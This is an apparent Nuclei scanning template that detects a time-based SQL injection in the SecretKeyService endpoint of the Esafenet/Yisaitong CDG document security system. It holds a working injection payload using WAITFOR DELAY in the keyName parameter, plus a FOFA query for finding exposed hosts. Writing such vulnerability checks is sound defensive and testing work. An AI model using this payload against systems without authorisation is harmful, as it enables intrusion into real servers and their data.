http:
    - matchers:
        - condition: and
          dsl:
            - duration>=3 && duration<5
            - status_code_1 == 200
          type: dsl
      matchers-condition: and
      raw:
        - |+
          @timeout: 30s
          GET /CDGServer3/SecretKeyService?command=sameKeyName&keyName=1'+WAITFOR+DELAY+'0:0:3'--+ HTTP/1.1
          Host: {{Hostname}}


id: yisaitong-CDG-SecretKeyService-sqli
info:
    author: xx
    description: 亿赛通电子文档安全管理系统 SecretKeyService SQL注入漏洞
    metadata:
        fofa-query: body="CDGServer3" || title="电子文档安全管理系统" || cert="esafenet" || body="/help/getEditionInfo.jsp"
    name: 亿赛通电子文档安全管理系统 SecretKeyService SQL注入漏洞
    severity: high
    tags:
        - yisaitong
